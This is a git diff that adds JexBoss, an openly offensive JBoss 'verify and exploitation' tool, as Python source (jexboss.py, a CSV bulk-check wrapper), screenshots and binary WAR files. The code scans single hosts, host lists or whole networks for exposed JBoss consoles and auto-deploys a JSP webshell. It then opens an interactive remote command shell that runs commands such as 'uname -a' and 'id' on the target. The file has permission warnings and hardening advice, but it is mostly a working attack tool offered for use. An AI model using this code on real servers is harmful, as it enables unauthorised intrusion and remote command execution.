b/Jboss_Verify_EXploitation/demo.png new file mode 100644 index 0000000..2c11cb3 Binary files /dev/null and b/Jboss_Verify_EXploitation/demo.png differ diff --git a/Jboss_Verify_EXploitation/jexboss.py b/Jboss_Verify_EXploitation/jexboss.py new file mode 100644 index 0000000..e8aec4a --- /dev/null +++ b/Jboss_Verify_EXploitation/jexboss.py @@ -0,0 +1,544 @@ +#!/usr/bin/env python +# -*- coding: utf-8 -*- +""" +JexBoss: Jboss verify and EXploitation Tool +https://github.com/joaomatosf/jexboss + +Copyright 2013 João Filho Matos Figueiredo + +Licensed under the Apache License, Version 2.0 (the "License"); +you may not use this file except in compliance with the License. +You may obtain a copy of the License at + + http://www.apache.org/licenses/LICENSE-2.0 + +Unless required by applicable law or agreed to in writing, software +distributed under the License is distributed on an "AS IS" BASIS, +WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. +See the License for the specific language governing permissions and +limitations under the License. +""" +import textwrap +import traceback + + +RED = '\x1b[91m' +RED1 = '\033[31m' +BLUE = '\033[94m' +GREEN = '\033[32m' +BOLD = '\033[1m' +NORMAL = '\033[0m' +ENDC = '\033[0m' + +__author__ = "João Filho Matos Figueiredo " +__version = "1.0.12" + +from sys import argv, exit, version_info + +if version_info[0] == 2 and version_info[1] < 7: + print(RED1 + BOLD + "\n * You are using the Python version 2.6. The JexBoss requires version >= 2.7.\n" + "" + GREEN + " Please install the Python version >= 2.7. \n\n" + " Example for CentOS using Software Collections scl:\n" + " # yum -y install centos-release-scl\n" + " # yum -y install python27\n" + " # scl enable python27 bash\n" + ENDC) + exit(0) + +import signal +from _exploits import * +from _updates import * +from os import name, system +import os +import shutil +from zipfile import ZipFile +from time import sleep +from random import randint +import argparse, socket + + +try: + from urllib.parse import urlencode +except ImportError: + from urllib import urlencode + +try: + from urllib3.util import parse_url + from urllib3 import disable_warnings, PoolManager + from urllib3.util.timeout import Timeout +except ImportError: + print(RED1 + BOLD + "\n * Package urllib3 not installed. Please install the dependencies before continue.\n" + "" + GREEN + " Example: \n" + " # pip install -r requires.txt\n" + ENDC) + exit(0) + +try: + import ipaddress +except: + print(RED1 + BOLD + "\n * Package ipaddress not installed. Please install the dependencies before continue.\n" + "" + GREEN + " Example: \n" + " # pip install -r requires.txt\n" + ENDC) + exit(0) + +from urllib3 import disable_warnings, PoolManager +from urllib3.util.timeout import Timeout + +disable_warnings() + +timeout = Timeout(connect=3.0, read=6.0) +pool = PoolManager(timeout=timeout, cert_reqs='CERT_NONE') + +global gl_interrupted +gl_interrupted = False + +user_agents = ["Mozilla/5.0 (Macintosh; Intel Mac OS X 10.10; rv:38.0) Gecko/20100101 Firefox/38.0", + "Mozilla/5.0 (Windows NT 6.1; WOW64; rv:38.0) Gecko/20100101 Firefox/38.0", + "Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/49.0.2623.112 Safari/537.36", + "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_11_2) AppleWebKit/601.3.9 (KHTML, like Gecko) Version/9.0.2 Safari/601.3.9", + "Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/44.0.2403.155 Safari/537.36", + "Mozilla/5.0 (Windows NT 5.1; rv:40.0) Gecko/20100101 Firefox/40.0", + "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; Trident/4.0; .NET CLR 2.0.50727; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729)", + "Mozilla/5.0 (compatible; MSIE 6.0; Windows NT 5.1)", + "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727)", + "Mozilla/5.0 (Windows NT 6.1; WOW64; rv:31.0) Gecko/20100101 Firefox/31.0", + "Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/46.0.2490.86 Safari/537.36", + "Opera/9.80 (Windows NT 6.2; Win64; x64) Presto/2.12.388 Version/12.17", + "Mozilla/5.0 (Windows NT 6.1; WOW64; rv:45.0) Gecko/20100101 Firefox/45.0", + "Mozilla/5.0 (Windows NT 6.1; WOW64; rv:41.0) Gecko/20100101 Firefox/41.0"] + +global gl_args + + +def handler_interrupt(signum, frame): + global gl_interrupted + gl_interrupted = True + print ("Interrupting execution ...") + +signal.signal(signal.SIGINT, handler_interrupt) + +def get_successfully(url, path): + """ + Test if a GET to a URL is successful + :param url: The base URL + :param path: The URL path + :return: The HTTP status code + """ + sleep(5) + headers = {"Accept": "text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8", + "Connection": "keep-alive", + "User-Agent": user_agents[randint(0, len(user_agents) - 1)]} + r = pool.request('GET', url + path, redirect=False, headers=headers) + result = r.status + if result == 404: + sleep(7) + r = pool.request('GET', url + path, redirect=False, headers=headers) + result = r.status + return result + + +def check_connectivity(host, port): + try: + s = socket.socket(socket.AF_INET, socket.SOCK_STREAM) + s.settimeout(2) + s.connect((str(host), int(port))) + s.close() + except socket.timeout: + return False + except: + return False + + + return True + + +def check_vul(url): + """ + Test if a GET to a URL is successful + :param url: The URL to test + :return: A dict with the exploit type as the keys, and the HTTP status code as the value + """ + if gl_args.mode == 'auto-scan' or gl_args.mode == 'file-scan': + timeout = Timeout(connect=1.0, read=3.0) + pool = PoolManager(timeout=timeout, retries=1, cert_reqs='CERT_NONE') + else: + timeout = Timeout(connect=3.0, read=6.0) + pool = PoolManager(timeout=timeout, cert_reqs='CERT_NONE') + + url_check = parse_url(url) + if '443' in str(url_check.port) and url_check.scheme != 'https': + url = "https://"+str(url_check.host)+":"+str(url_check.port) + + print(GREEN + "\n ** Checking Host: %s **\n" % url) + + headers = {"Accept": "text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8", + "Connection": "keep-alive", + "User-Agent": user_agents[randint(0, len(user_agents) - 1)]} + + paths = {"jmx-console": "/jmx-console/HtmlAdaptor?action=inspectMBean&name=jboss.system:type=ServerInfo", + "web-console" : "/web-console/ServerInfo.jsp", + "JMXInvokerServlet": "/invoker/JMXInvokerServlet", + "admin-console" : "/admin-console/"} + + for i in paths.keys(): + if gl_interrupted: break + try: + print(GREEN + " * Checking %s: \t" % i + ENDC), + r = pool.request('HEAD', url +str(paths[i]), redirect=False, headers=headers) + paths[i] = r.status + + # check if it's false positive + if len(r.getheaders()) == 0: + print(RED + "[ ERROR ]\n * The server %s is not an HTTP server.\n" % url + ENDC) + paths = {"jmx-console": 505, + "web-console": 505, + "JMXInvokerServlet": 505, + "admin-console": 505} + break + + if paths[i] in (301, 302, 303, 307, 308): + url_redirect = r.get_redirect_location() + print(GREEN + "[ REDIRECT ]\n * The server sent a redirect to: %s\n" % url_redirect) + elif paths[i] == 200 or paths[i] == 500: + if i == "admin-console": + print(RED + "[ EXPOSED ]" + ENDC) + else: + print(RED + "[ VULNERABLE ]" + ENDC) + else: + print(GREEN + "[ OK ]") + except: + print(RED + "\n * An error occurred while connecting to the host %s\n" % url + ENDC) + paths[i] = 505 + + return paths + +def auto_exploit(url, exploit_type): + """ + Automatically exploit a URL + :param url: The URL to exploit + :param exploit_type: One of the following + exploitJmxConsoleFileRepository: tested and working in JBoss 4 and 5 + exploitJmxConsoleMainDeploy: tested and working in JBoss 4 and 6 + exploitWebConsoleInvoker: tested and working in JBoss 4 + exploitJMXInvokerFileRepository: tested and working in JBoss 4 and 5 + exploitAdminConsole: tested and working in JBoss 5 and 6 (with default password) + """ + print(GREEN + "\n * Sending exploit code to %s. Please wait...\n" % url) + result = 505 + if exploit_type == "jmx-console": + result = exploit_jmx_console_file_repository(url) + if result != 200 and result != 500: + result = exploit_jmx_console_main_deploy(url) + elif exploit_type == "web-console": + result = exploit_web_console_invoker(url) + elif exploit_type == "JMXInvokerServlet": + result = exploit_jmx_invoker_file_repository(url, 0) + if result != 200 and result != 500: + result = exploit_jmx_invoker_file_repository(url, 1) + elif exploit_type == "admin-console": + result = exploit_admin_console(url) + + if result == 200 or result == 500: + if not gl_args.auto_exploit: + print(GREEN + " * Successfully deployed code! Starting command shell. Please wait...\n" + ENDC) + shell_http(url, exploit_type) + else: + print(GREEN + " * Successfully deployed code via vector %s\n *** Run JexBoss in Standalone mode to open command shell. ***" %(exploit_type) + ENDC) + return True + else: + print(RED + "\n * Could not exploit the flaw automatically. Exploitation requires manual analysis...\n" + + " Waiting for 7 seconds...\n " + ENDC) + if gl_args.mode == 'standalone': + sleep(7) + return False + else: + return False + +def shell_http(url, shell_type): + """ + Connect to an HTTP shell + :param url: The URL to connect to + :param shell_type: The type of shell to connect to + """ + headers = {"Accept": "text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8", + "Connection": "keep-alive", + "User-Agent": user_agents[randint(0, len(user_agents) - 1)]} + + if gl_args.disable_check_updates: + headers['check-updates'] = 'false' + + if shell_type == "jmx-console" or shell_type == "web-console" or shell_type == "admin-console": + path = '/jexws3/jexws3.jsp?' + elif shell_type == "JMXInvokerServlet": + path = '/jexinv3/jexinv3.jsp?' + + pool.request('GET', url+ path, redirect=False, headers=headers) + + sleep(7) + resp = "" + print(" * - - - - - - - - - - - - - - - - - - - - LOL - - - - - - - - - - - - - - - - - - - - * \n") + print(RED + " * " + url + ": \n" + ENDC) + + for cmd in ['uname -a', 'cat /etc/issue', 'id']: + cmd = urlencode({"ppp": cmd}) + r = pool.request('GET', url + path + cmd, redirect=False, headers=headers) + resp += " " + str(r.data).split(">")[1] + print(resp.replace('\\n', '\n')), + + while 1: + print(BLUE + "[Type commands or \"exit\" to finish]") + cmd = input("Shell> " + ENDC) if version_info[0] >= 3 else raw_input("Shell> " + ENDC) + if cmd == "exit": + break + + cmd = urlencode({"ppp": cmd}) + r = pool.request('GET', url + path + cmd, redirect=False, headers=headers) + resp = str(r.data) + if r.status == 404: + print(RED + " * Error contacting the command shell. Try again later...") + continue + stdout = "" + try: + stdout = resp.split("pre>")[1] + except: + print(RED + " * Error contacting the command shell. Try again later...") + if stdout.count("An exception occurred processing JSP page") == 1: + print(RED + " * Error executing command \"%s\". " % cmd.split("=")[1] + ENDC) + else: + print(stdout.replace('\\n', '\n')) + +def clear(): + """ + Clears the console + """ + if name == 'posix': + system('clear') + elif name == ('ce', 'nt', 'dos'): + system('cls') + +def banner(): + """ + Print the banner + """ + clear() + print(RED1 + "\n * --- JexBoss: Jboss verify and EXploitation Tool --- *\n" + " | |\n" + " | @author: João Filho Matos Figueiredo |\n" + " | @contact: joaomatosf@gmail.com |\n" + " | |\n" + " | @update: https://github.com/joaomatosf/jexboss |\n" + " #______________________________________________________#\n") + print(RED1 + " @version: %s\n"%__version ) + + print (ENDC) + +def help_usage(): + usage = (BOLD + BLUE + "\n Examples:\n" + ENDC + + BLUE + "\n For simple usage, you must provide the host name or IP address you want to test:" + + GREEN + "\n\n $ python jexboss.py -host https://site.com.br" + + BLUE + "\n\n For auto scan mode, you must provide the network in CIDR format, list of ports and filename for store results:" + + GREEN + "\n\n $ python jexboss.py -mode auto-scan -network 192.168.0.0/24 -ports 8080,80 -results report_auto_scan.log" + + BLUE + "\n\n For file scan mode, you must provide the filename with host list to be scanned (one host per line)and filename for store results:" + + GREEN + "\n\n $ python jexboss.py -mode file-scan -file host_list.txt -out report_file_scan.log" + ENDC) + return usage + +def network_args(string): + try: + if version_info[0] >= 3: + value = ipaddress.ip_network(string) + else: + value = ipaddress.ip_network(unicode(string)) + except: + msg = "%s is not a network address in CIDR format." % string + raise argparse.ArgumentTypeError(msg) + return value + +def main(): + """ + Run interactively. Call when the module is run by itself. + :return: Exit code + """ + # check for Updates + updates = check_updates() + if updates: + print(BLUE + BOLD + "\n\n * An update is available and is recommended update before continuing.\n" + + " Do you want to update now?") + pick = input(" YES/no ? ").lower() if version_info[0] >= 3 else raw_input(" YES/no ? ").lower() + print (ENDC) + if pick != "no": + updated = auto_update() + if updated: + print(GREEN + BOLD + "\n * The JexBoss has been successfully updated. Please run again to enjoy the updates.\n" +ENDC) + exit(0) + else: + print(RED + BOLD + "\n\n * An error occurred while updating the JexBoss. Please try again..\n" +ENDC) + exit(1) + + vulnerables = False + # check vulnerabilities for standalone mode + if gl_args.mode == 'standalone': + url = gl_args.host + scan_results = check_vul(url) + # performs exploitation + for i in ["jmx-console", "web-console", "JMXInvokerServlet", "admin-console"]: + if scan_results[i] == 200 or scan_results[i] == 500: + vulnerables = True + if gl_args.auto_exploit: + auto_exploit(url, i) + else: + print(BLUE + "\n\n * Do you want to try to run an automated exploitation via \"" + + BOLD + i + NORMAL + "\" ?\n" + + " This operation will provide a simple command shell to execute commands on the server..\n" + + RED + " Continue only if you have permission!" + ENDC) + pick = input(" yes/NO ? ").lower() if version_info[0] >= 3 else raw_input(" yes/NO ? ").lower() + if pick == "yes": + auto_exploit(url, i) + # check vulnerabilities for auto scan mode + elif gl_args.mode == 'auto-scan': + file_results = open(gl_args.results, 'w') + file_results.write("JexBoss Scan Mode Report\n\n") + for ip in gl_args.network.hosts(): + if gl_interrupted: break + for port in gl_args.ports.split(","): + if check_connectivity(ip, port): + url = "{0}:{1}".format(ip,port) + ip_results = check_vul(url) + for key in ip_results.keys(): + if ip_results[key] == 200 or ip_results[key] == 500: + vulnerables = True + if gl_args.auto_exploit: + result_exploit = auto_exploit(url, key) + if result_exploit: + file_results.write("{0}:\t[EXPLOITED VIA {1}]\n".format(url, key)) + else: + file_results.write("{0}:\t[FAILED TO EXPLOITED VIA {1}]\n".format(url, key)) + else: + file_results.write("{0}:\t[POSSIBLY VULNERABLE TO {1}]\n".format(url, key)) + + file_results.flush() + else: + print (RED+"\n * Host %s:%s does not respond."% (ip,port)+ENDC) + file_results.close() + + elif gl_args.mode == 'file-scan': + file_results = open(gl_args.out, 'w') + file_results.write("JexBoss Scan Mode Report\n\n") + file_input = open(gl_args.file, 'r') + for url in file_input.readlines(): + if gl_interrupted: break + url = url.strip() + ip = str(parse_url(url)[2]) + port = parse_url(url)[3] if parse_url(url)[3] != None else 80 + if check_connectivity(ip, port): + url_results = check_vul(url) + for key in url_results.keys(): + if url_results[key] == 200 or url_results[key] == 500: + vulnerables = True + if gl_args.auto_exploit: + result_exploit = auto_exploit(url, key) + if result_exploit: + file_results.write("{0}:\t[EXPLOITED VIA {1}]\n".format(url, key)) + else: + file_results.write("{0}:\t[FAILED TO EXPLOITED VIA {1}]\n".format(url, key)) + else: + file_results.write("{0}:\t[POSSIBLY VULNERABLE TO {1}]\n".format(url, key)) + + file_results.flush() + else: + print (RED + "\n * Host %s:%s does not respond." % (ip, port) + ENDC) + file_results.close() + + # resume results + if vulnerables: + banner() + print(RED + BOLD+" Results: potentially compromised server!" + ENDC) + if gl_args.mode == 'file-scan': + print(RED + BOLD + " ** Check more information on file {0} **".format(gl_args.out) + ENDC) + elif gl_args.mode == 'auto-scan': + print(RED + BOLD + " ** Check more information on file {0} **".format(gl_args.results) + ENDC) + print(GREEN + " * - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -*\n" + +BOLD+ " Recommendations: \n" +ENDC+ + GREEN+ " - Remove web consoles and services that are not used, eg:\n" + " $ rm web-console.war\n" + " $ rm http-invoker.sar\n" + " $ rm jmx-console.war\n" + " $ rm jmx-invoker-adaptor-server.sar\n" + " $ rm admin-console.war\n" + " - Use a reverse proxy (eg. nginx, apache, F5)\n" + " - Limit access to the server only via reverse proxy (eg. DROP INPUT POLICY)\n" + " - Search vestiges of exploitation within the directories \"deploy\" and \"management\".\n\n" + " References:\n" + " [1] - https://developer.jboss.org/wiki/SecureTheJmxConsole\n" + " [2] - https://issues.jboss.org/secure/attachment/12313982/jboss-securejmx.pdf\n" + "\n" + " - If possible, discard this server!\n" + " * - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -*\n") + else: + print(GREEN + "\n\n * Results: \n" + + " The server is not vulnerable to bugs tested ... :D\n\n" + ENDC) + # infos + print(ENDC + " * Info: review, suggestions, updates, etc: \n" + + " https://github.com/joaomatosf/jexboss\n") + + print(GREEN + BOLD + " * DONATE: " + ENDC + "Please consider making a donation to help improve this tool,\n" + " including research to new versions of JBoss and zero days. \n\n" + + GREEN + BOLD + " * Paypal: " + ENDC + " joaomatosf@gmail.com \n" + + GREEN + BOLD + " * Bitcoin Address: " + ENDC + " 14x4niEpfp7CegBYr3tTzTn4h6DAnDCD9C \n" + + GREEN + BOLD + " * URI: " + ENDC + " bitcoin:14x4niEpfp7CegBYr3tTzTn4h6DAnDCD9C?label=jexboss\n") + + +print(ENDC) + +banner() + + +if __name__ == "__main__": + + parser = argparse.ArgumentParser( + formatter_class=argparse.RawDescriptionHelpFormatter, + #description="JexBoss v%s: JBoss verify and EXploitation Tool" %__version, + description=textwrap.dedent(RED1 + "\n * --- JexBoss: Jboss verify and EXploitation Tool --- *\n" + " | |\n" + " | @author: João Filho Matos Figueiredo |\n" + " | @contact: joaomatosf@gmail.com |\n" + " | |\n" + " | @update: https://github.com/joaomatosf/jexboss |\n" + " #______________________________________________________#\n" + " @version: "+__version+"\n"+ help_usage()), + epilog="", + prog="JexBoss" + ) + + group_standalone = parser.add_argument_group('Standalone mode') + group_auto_scan = parser.add_argument_group('Auto scan mode') + group_file_scan = parser.add_argument_group('File scan mode') + + parser.add_argument('--version', action='version', version='%(prog)s ' + __version) + parser.add_argument("--auto-exploit", "-A", + help="Send exploit code automatically (USE ONLY IF YOU HAVE PERMISSION!!!)", + action='store_true') + parser.add_argument("--disable-check-updates", "-D", help="Disable the check for updates performed by JSP Webshell at: http://webshell.jexboss.net/jsp_version.txt", + action='store_true') + parser.add_argument('-mode', help="Operation mode", choices=['standalone', 'auto-scan', 'file-scan'], default='standalone') + + group_standalone.add_argument("-host", help="Host address to be checked (eg. http://192.168.0.10:8080)", + type=str) + group_auto_scan.add_argument("-network", help="Network to be checked in CIDR format (eg. 10.0.0.0/8)", + type=network_args, default='192.168.0.0/24') + group_auto_scan.add_argument("-ports", + help="List of ports separated by commas to be checked for each host (eg. 8080,8443,8888,80,443)", type=str, default='8080,80') + group_auto_scan.add_argument("-results", + help="File name to store the auto scan results", type=str, metavar='FILENAME', default='jexboss_auto_scan_results.log') + + group_file_scan.add_argument("-file", help="Filename with host list to be scanned (one host per line)", type=str, metavar='FILENAME_HOSTS') + group_file_scan.add_argument("-out", help="File name to store the file scan results", type=str, metavar='FILENAME_RESULTS', default='jexboss_file_scan_results.log') + + gl_args = parser.parse_args() + + #if 'h' not in gl_args and gl_args.host == None: + # parser.print_help() + + if gl_args.mode == 'standalone' and gl_args.host == None or \ + gl_args.mode == 'file-scan' and gl_args.file == None: + banner() + exit(0) + else: + main() diff --git a/Jboss_Verify_EXploitation/jexcsv.py b/Jboss_Verify_EXploitation/jexcsv.py new file mode 100644 index 0000000..c2d9cde --- /dev/null +++ b/Jboss_Verify_EXploitation/jexcsv.py @@ -0,0 +1,62 @@ +""" +Check URLs for JBoss vulnerabilities in bulk and output results to a CSV file + +Copyright 2016 Sean Whalen + +Licensed under the Apache License, Version 2.0 (the "License"); +you may not use this file except in compliance with the License. +You may obtain a copy of the License at + + http://www.apache.org/licenses/LICENSE-2.0 + +Unless required by applicable law or agreed to in writing, software +distributed under the License is distributed on an "AS IS" BASIS, +WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. +See the License for the specific language governing permissions and +limitations under the License. +""" + +from argparse import ArgumentParser +from csv import DictWriter + +from jexboss import check_vul + +__version__ = "1.0.0" +__author__ = "Sean Whalen - @SeanTheGeek" + +args = ArgumentParser(description=__doc__) +args.add_argument("input", help="Path to the input file") +args.add_argument("output", help="Path to the output file") +args = args.parse_args() + +paths = {"jmx-console": "/jmx-console/HtmlAdaptor?action=inspectMBean&name=jboss.system:type=ServerInfo", + "web-console" : "/web-console/ServerInfo.jsp", + "JMXInvokerServlet": "/invoker/JMXInvokerServlet"} + +results = [] + +with open(args.input, "r") as input_file: + urls = input_file.readlines() + + +for url in urls: + if url == "": + continue + if not url.startswith("http"): + url = "http://{0}".format(url) + url = url.strip() + if url.endswith("/"): + url = url[:-1] + + url_results = check_vul(url) + for key in url_results.keys(): + if url_results[key] == 200 or url_results[key] == 500: + full_url = "{0}{1}".format(url, paths[key]) + result = dict(base_url=url, vulnerability=key, full_url=full_url, status_code=url_results[key]) + results.append(result) + +fields = ["base_url", "vulnerability", "full_url", "status_code"] +with open(args.output, "w") as output_file: + writer = DictWriter(output_file, fields) + writer.writeheader() + writer.writerows(results) diff --git a/Jboss_Verify_EXploitation/requires.txt b/Jboss_Verify_EXploitation/requires.txt new file mode 100644 index 0000000..3fe0b6b --- /dev/null +++ b/Jboss_Verify_EXploitation/requires.txt @@ -0,0 +1,2 @@ +urllib3 +ipaddress diff --git a/Jboss_Verify_EXploitation/screenshots/help_usage.png b/Jboss_Verify_EXploitation/screenshots/help_usage.png new file mode 100644 index 0000000..a219c5e Binary files /dev/null and b/Jboss_Verify_EXploitation/screenshots/help_usage.png differ diff --git a/Jboss_Verify_EXploitation/screenshots/network_scan_mode.png b/Jboss_Verify_EXploitation/screenshots/network_scan_mode.png new file mode 100644 index 0000000..2345670 Binary files /dev/null and b/Jboss_Verify_EXploitation/screenshots/network_scan_mode.png differ diff --git a/Jboss_Verify_EXploitation/screenshots/results_and_recommendations.png b/Jboss_Verify_EXploitation/screenshots/results_and_recommendations.png new file mode 100644 index 0000000..1402ce9 Binary files /dev/null and b/Jboss_Verify_EXploitation/screenshots/results_and_recommendations.png differ diff --git a/Jboss_Verify_EXploitation/screenshots/scan_with_auto_exploit_mode.png b/Jboss_Verify_EXploitation/screenshots/scan_with_auto_exploit_mode.png new file mode 100644 index 0000000..211b949 Binary files /dev/null and b/Jboss_Verify_EXploitation/screenshots/scan_with_auto_exploit_mode.png differ diff --git a/Jboss_Verify_EXploitation/screenshots/standalone_mode.png b/Jboss_Verify_EXploitation/screenshots/standalone_mode.png new file mode 100644 index 0000000..e326188 Binary files /dev/null and b/Jboss_Verify_EXploitation/screenshots/standalone_mode.png differ diff --git a/Jboss_Verify_EXploitation/util/jbossass.war b/Jboss_Verify_EXploitation/util/jbossass.war new file mode 100644 index 0000000..387f8f0 Binary files /dev/null and b/Jboss_Verify_EXploitation/util/jbossass.war differ diff --git a/Jboss_Verify_EXploitation/util/jexws.war b/Jboss_Verify_EXploitation/util/jexws.war new file mode 100644 index 0000000..387f8f0 Binary files /dev/null and b/Jboss_Verify_EXploitation/util/jexws.war differ